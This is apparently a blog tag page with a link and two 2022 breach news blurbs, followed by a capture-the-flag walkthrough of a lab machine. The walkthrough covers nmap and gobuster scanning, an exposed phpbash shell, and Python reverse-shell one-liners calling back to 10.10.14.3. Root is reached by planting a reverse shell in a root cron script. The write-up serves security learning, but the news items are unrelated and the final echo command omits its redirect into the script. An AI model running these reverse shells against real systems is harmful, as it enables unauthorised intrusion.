#misconfiguration

Read the full report on -

Read the full report on -https://cyberbivash.blogspot.com/2025/12/how-single-misconfiguration-caused.html

Microsoft Confirms Data Breach, But Claims Numbers Are Exaggerated

Home › Cloud Security Microsoft Confirms Data Breach, But Claims Numbers Are Exaggerated By Eduard Kovacs on October 20, 2022 Tweet Microsoft has confirmed that it inadvertently exposed information related to prospective customers, but claims that the company which reported the incident has exaggerated the numbers. Threat intelligence firm SOCRadar revealed on Wednesday that it has identified…

Toyota Discloses Data Breach Impacting Source Code, Customer Email Addresses

Home › Email Security Toyota Discloses Data Breach Impacting Source Code, Customer Email Addresses By Ionut Arghire on October 11, 2022 Tweet Japanese car manufacturer Toyota has disclosed a security incident that involved source code hosted on GitHub and which may have resulted in unauthorized access to roughly 300,000 customer email addresses. The incident, the company says, impacts customers…

---------------------------------------------- Reconnaissance - Open port enumeration - Directories and files enumeration

Shell upgrade

Privilege Escalation - Check for misconfigurations - Inject reverse-shell payload ----------------------------------------------

RECONAISSANCE

nmap scan Check for open ports; run the nmap scan. ** though flag options may vary, I’ve included -O (for OS), -sV (for service version), -Pn (to check for active machines with ping disabled), -sC (for script), and -sS (for stealth).

INPUT: sudo nmap -sSCV -O -Pn 10.10.10.68 | tee “nmapscan”

There is only one open port, port 80. Since port 80 is a http service, we should be able to open up the web-server application from our browser and view the site. Moreover, since http is an unencrypted web server, we might be able to find some information from the site’s source code.

Gobuster Run a gobuster scan to enumerate web directories/files. ** I’ve run gobuster with the common.txt file (in /usr/share/wordlists/dirb/)

INPUT: gobuster dir -u http://10.10.10.68-w /usr/share/wordlists/dirb/common.txt | tee gobuster

There is only one network status 200, and a couple of redirects. Immediately we might notice some common directories like “css”, “images”, and fonts”, but the information also tells us that the site utilizes “php” and has an open “dev” directory for us to view.

We can also confirm this when we view the web page; looking through the blog post on the site, we can see that the user “Arrexel” says he has been using phpbash “on this exact server”. Perhaps the phpbash file is within the “dev” for developer directory?

Web page

*** before checking the “dev” directory, I was also looking for any information that might lead us to an exploit. Though unsuccessful, the site’s Content Management System (CMS) information and a page where we might be able to upload a Remote File Inclusion (RFI) or get to a Local File Inclusion (LFI) was worth examining.

Web page - /dev/ We’ve found the “developers” page and it is unrestricted. This is a serious security misconfiguration, as the open shell gives access to the web-server for anyone. Since Arrexel stated in his blog post that he uses the phpbash for pentesting on this very site, we might expect some additional vulnerabilities once in the server.

UPGRADING SHELL

Although we have our initial foothold into the server, the bash shell may be limiting and buggy; there might be frequent freezes or crashes, and we might not be able to control tab complete. Let’s upgrade our shell; we can accomplish this by launching a reverse shell payload from our target’s machine, and set up a listener from our attack machine to catch the signal.

*** I initially tried a php reverse shell and was unsuccessful; I tried the python reverse shell next, and that worked;

*** Don’t forget to set the ip address to your attacker’s, vpn (often labeled as “tun0” from ifconfig)

(from target’s shell) INPUT: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(from attacker’s terminal) INPUT: netcat -nlvkp 1234

We’re connected. Next, upgrade to a tty shell.

INPUT: python -c 'import pty; pty.spawn("/bin/bash")'

User flag Now that we have our own shell, let’s search for the user flag. After searching through the home/arrexel/ directory, we find our user.txt and open it to find the flag .

PRIVILEGE ESCALATION

Recon The last step is escalating our privilege to root. But before doing so, we’ll need more information about the server. We can check for any security misconfigurations like: - finding sudo permissions to run commands for any other users besides root - look up any files configured to setuid permissions - enumerate system services and kernel information - enumerate user information (checking /etc/passwd or /etc/shadow files), etc.

During this process we’ll notice the following information. Our current user can run any commands as the script manager without a password.

INPUT: sudo -l

Additionally, after checking the directories and files, I notice that there is a directory called “scripts”, where the user scriptmanager has read/write/execute permissions. When we initially try to view this directory as www-data, we will get a permission denied.

User, scriptmanager To view the scripts directory, let’s switch to the user, scriptmanager. As scriptmanager, we should be able to view the scripts directory.

INPUT: sudo -u scriptmanager /bin/bash

When we view the test.py file, we’ll notice something interesting. The script of the test.py file, opens and writes to the test.txt file.

Furthermore, when we ls -lh the test.txt file, we’ll notice that the file’s timestamp is fairly recent.

If our theory is correct, the test.txt is running a cron job from  the test.py file, which means we should be able to edit the test.py file, and run it as the root user.

Hence, we’ll edit the test.py file and include another reverse shell; only this time, since the cron job is referring the test.txt file as root, we should be able to listen in and receive a root shell.

(from target’s shell) INPUT: echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(from kali terminal) INPUT: netcat -nlvkp 4321

And… we are ROOT!

Find root flag Finally, search for the root flag; this will be found in /root/root.txt